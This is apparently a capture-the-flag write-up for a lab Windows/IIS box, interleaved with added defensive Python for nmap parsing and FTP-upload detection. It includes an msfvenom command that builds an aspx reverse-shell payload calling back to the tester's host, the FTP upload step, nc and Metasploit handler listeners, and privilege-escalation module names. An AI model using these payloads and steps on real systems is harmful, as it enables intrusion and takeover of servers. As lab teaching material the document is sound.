Enumeration
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
The nmap result shows that both the FTP server and the web server are open.
The web server is IIS 7.5.
The FTP server allows anonymous login.
We also see that the FTP listing contains the files iisstart.htm and welcome.png.
If we visit the website, we can check these two files.
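The combination above (anonymous FTP whose listing contains the default IIS files, next to an IIS server) is what makes the rest of the writeup possible, because it suggests the FTP root is the web root. The following is an added example, not part of the original writeup: a small parser for nmap's normal output that flags that combination and the risky HTTP methods nmap reported. The input is the scan output reproduced from above; the port/script regexes and the list of default IIS files are my own assumptions.

```python
import re

# Sample input: the nmap normal-output lines reproduced from the scan above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
"""

# "21/tcp open ftp Microsoft ftpd" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script output lines start with "| " or "|_"
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")
# Assumption: these are the files IIS places in a fresh wwwroot; seeing them in an
# FTP listing is a strong hint that the FTP root and the web root are the same directory.
IIS_DEFAULT_FILES = {"iisstart.htm", "welcome.png", "aspnet_client"}


def parse_nmap(text):
    """Return {port: {"state", "service", "version", "script": [lines]}}."""
    ports = {}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            current = ports[port] = {
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "script": [],
            }
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            # Attach script output to the port it follows
            current["script"].append(m.group(1).strip())
    return ports


def assess(ports):
    """Return a list of human-readable findings for the exposure seen in this scan."""
    findings = []
    ftp = ports.get(21)
    http = ports.get(80)
    if ftp:
        script = ftp["script"]
        anon = any(s.startswith("ftp-anon: Anonymous FTP login allowed") for s in script)
        if anon:
            findings.append("anonymous FTP login allowed")
        # Directory-listing lines in ftp-anon output begin with a MM-DD-YY date
        listed = {s.split()[-1] for s in script if re.match(r"\d\d-\d\d-\d\d ", s)}
        overlap = listed & IIS_DEFAULT_FILES
        if anon and http and overlap:
            findings.append("anonymous FTP root appears to be the IIS web root: "
                            + ", ".join(sorted(overlap)))
    if http:
        for s in http["script"]:
            if s.startswith("Potentially risky methods:"):
                findings.append("risky HTTP methods: " + s.split(":", 1)[1].strip())
    return findings


if __name__ == "__main__":
    for finding in assess(parse_nmap(NMAP_OUTPUT)):
        print("[!]", finding)
```

The parser only proves that the FTP root is readable; whether anonymous users can also write into it is confirmed later in the writeup by the upload itself, so the finding is worded as "appears to be".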
Using the FTP server
Since the FTP server accepts anonymous logins, we can also upload a script file of our choosing.
The web server is IIS 7.5, which serves files with the aspx extension.
To craft a reverse shell payload with the aspx extension, I used msfvenom.
You can check the list of payloads and choose a proper one.
msfvenom -l payloads | grep windows
Then, I chose the windows/shell_reverse_tcp payload. Be aware that netcat can only handle stageless payloads.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=9999 -f aspx -o eon.aspx
This writes the eon.aspx file; upload it to the web server via the FTP server.
# After anonymous login to FTP
put eon.aspx
Then listen on the port I set.
nc -lvnp 9999
If I visit 10.10.10.5/eon.aspx, the shell connects back.
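From the defender's side, the sequence just described leaves a very recognizable trace: an anonymous FTP STOR of a script file into the web root, followed by an HTTP request for that same path. The following is an added example, not part of the original writeup: detection logic that correlates an IIS FTP log with an IIS web log and raises an alert for that pair. The log lines are constructed to mirror the events in the writeup (they are not real logs from the box), and the field layout follows the IIS W3C log convention via a #Fields header, which the parser reads rather than assuming fixed columns.

```python
import os
from datetime import datetime, timedelta

# Constructed sample logs in IIS W3C format; timestamps mirror the writeup's session.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2024-04-21 21:30:01 10.10.14.4 - 10.10.10.5 21 USER anonymous 331
2024-04-21 21:30:01 10.10.14.4 anonymous 10.10.10.5 21 PASS *** 230
2024-04-21 21:30:05 10.10.14.4 anonymous 10.10.10.5 21 STOR /eon.aspx 226
2024-04-21 21:30:09 10.10.14.4 anonymous 10.10.10.5 21 RETR /welcome.png 226
"""

WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-04-21 21:30:20 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.4 Mozilla/5.0 200
2024-04-21 21:31:34 10.10.10.5 GET /eon.aspx - 80 - 10.10.14.4 Mozilla/5.0 200
"""

# Extensions IIS hands to a script engine rather than serving as static content (assumed list)
EXEC_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # field names follow the directive
        elif line.startswith("#") or not line.strip():
            continue                            # other directives / blank lines
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows


def _ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def find_uploaded_then_executed(ftp_rows, web_rows, window=timedelta(hours=24)):
    """Pair FTP STORs of script files with a later HTTP request for the same path."""
    alerts = []
    uploads = [
        r for r in ftp_rows
        if r.get("cs-method") == "STOR"
        and os.path.splitext(r["cs-uri-stem"])[1].lower() in EXEC_EXTENSIONS
    ]
    for up in uploads:
        for req in web_rows:
            same_path = req["cs-uri-stem"].lower() == up["cs-uri-stem"].lower()
            in_window = _ts(up) <= _ts(req) <= _ts(up) + window
            if same_path and in_window:
                alerts.append({
                    "path": up["cs-uri-stem"],
                    "uploaded_by": f'{up["cs-username"]}@{up["c-ip"]}',
                    "uploaded_at": up["date"] + " " + up["time"],
                    "requested_by": req["c-ip"],
                    "requested_at": req["date"] + " " + req["time"],
                    "status": req["sc-status"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_uploaded_then_executed(parse_w3c(FTP_LOG), parse_w3c(WEB_LOG)):
        print("[!] script uploaded via FTP and then requested over HTTP:", alert)
```

Even without the HTTP half, a STOR of any file in EXEC_EXTENSIONS by the anonymous user is worth an alert on its own; the correlation mainly tells the responder whether the upload was actually executed, and from which client.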
c:\Users>whoami
whoami
iis apppool\web
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
However, we run into a permission issue.
We don’t have permission to read the user and Administrator directories… 🙁
Privilege escalation
I googled for information on privilege escalation.
Then I found that Metasploit has a module called the local exploit suggester. It suggests possible exploits that can be run with the current session.
To use Metasploit, I chose the payload windows/meterpreter/reverse_tcp.
To open a session in Metasploit, we need to run exploit/multi/handler. It is the Metasploit equivalent of netcat.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.4:9999
[*] Sending stage (175686 bytes) to 10.10.10.5
whoami
[*] Meterpreter session 13 opened (10.10.14.4:9999 -> 10.10.10.5:49225) at 2024-04-21 21:31:34 -0400
We opened session 13. It is a shell without elevated privileges, just like the reverse shell we got with netcat.
Next, we will use this open session to get exploit suggestions.
Send the session to the background with ctrl+z.
use post/multi/recon/local_exploit_suggester
set session 13
After setting the required parameters for local_exploit_suggester, run it.
It then gives us a list of potential vulnerabilities. You can choose one of them.
Some of them may work and some of them may not. I tried 3, 10 and 13, but 10 didn’t work.
Let’s use number 13: windows/local/ms16_075_reflection_juicy
After setting the required parameters, you will get a new session with elevated privileges.
The user flag is in babis’s home directory and the root flag is in Administrator’s directory.
Below is the same result obtained with another potential vulnerability, windows/local/ms10_015_kitrap0d.